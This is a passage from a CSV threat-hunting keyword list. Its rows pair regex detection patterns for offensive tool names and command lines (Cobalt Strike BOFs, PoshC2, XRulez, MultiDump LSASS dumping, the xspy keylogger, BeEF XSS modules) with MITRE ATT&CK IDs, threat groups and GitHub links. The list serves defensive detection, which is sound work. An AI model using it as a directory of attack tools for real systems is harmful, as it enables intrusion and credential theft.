LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*xor.py *.dll*",".{0,1000}xor\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*XOR_b64_encrypted*covenant.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*XOR_b64_encrypted*covenant2.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant2\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*XOR_b64_encrypted*havoc.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}havoc\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 
- T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*xor_crypt_and_encode(*",".{0,1000}xor_crypt_and_encode\(.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*xor_encrypt(*",".{0,1000}xor_encrypt\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*xor_payload*",".{0,1000}xor_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*xor-bin.py *.exe*",".{0,1000}xor\-bin\.py\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*xoreaxeaxeax*",".{0,1000}xoreaxeaxeax.{0,1000}","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*XorEncoder.py*",".{0,1000}XorEncoder\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*XOR-Payloads.py*",".{0,1000}XOR\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - 
T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*xpipe \\*",".{0,1000}xpipe\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe*lsass*",".{0,1000}xpipe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.c*",".{0,1000}xpipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.cna*",".{0,1000}xpipe\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpipe.o*",".{0,1000}xpipe\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*xpn*ntlmquic*",".{0,1000}xpn.{0,1000}ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xrdp.c*",".{0,1000}xrdp\.c.{0,1000}","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. 
iOS and Android).can be used by attacker","T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","5290","1706","2024-05-01T17:03:11Z","2011-04-25T14:31:17Z" "*Xre0uS/MultiDump*",".{0,1000}Xre0uS\/MultiDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*xRET2pwn/PickleC2*",".{0,1000}xRET2pwn\/PickleC2.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*XRMod_h64e.exe*",".{0,1000}XRMod_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + XRMod.rwdi.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + 
XRMod.x64.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*Xrulez + XRMod.x86.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez binaries.zip*",".{0,1000}XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.rwdi.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.x64.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules 
to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.%2B.XRMod.x86.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.+.XRMod.x64.binaries*",".{0,1000}XRulez\.\+\.XRMod\.x64\.binaries.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez.exe *",".{0,1000}XRulez\.exe\s.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_h64d.dll*",".{0,1000}XRulez_h64d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - 
TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_h64e.exe*",".{0,1000}XRulez_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulez_rwdi86d.dll*",".{0,1000}XRulez_rwdi86d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*XRulezDll_rwdi64.dll*",".{0,1000}XRulezDll_rwdi64\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*xs.exe -connect *",".{0,1000}xs\.exe\s\-connect\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 
- T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xscreensaver_log_priv_esc*",".{0,1000}xscreensaver_log_priv_esc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*xshell_xftp_password.md*",".{0,1000}xshell_xftp_password\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*XSpear -u *",".{0,1000}XSpear\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*xspy -display*",".{0,1000}xspy\s\-display.{0,1000}","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","23","16","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" "*xsrfprobe -u *",".{0,1000}xsrfprobe\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*xsser -u * -g */login?password=* --Coo*",".{0,1000}xsser\s\-u\s.{0,1000}\s\-g\s.{0,1000}\/login\?password\=.{0,1000}\s\-\-Coo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*XSS-labs*",".{0,1000}XSS\-labs.{0,1000}","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","55","27","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z" "*XSS-Payloads*",".{0,1000}XSS\-Payloads.{0,1000}","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xssrays.js*",".{0,1000}xssrays\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssrays.rb*",".{0,1000}xssrays\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssrays_spec.rb*",".{0,1000}xssrays_spec\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssraysdetail.rb*",".{0,1000}xssraysdetail\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*xssraysscan.rb*",".{0,1000}xssraysscan\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
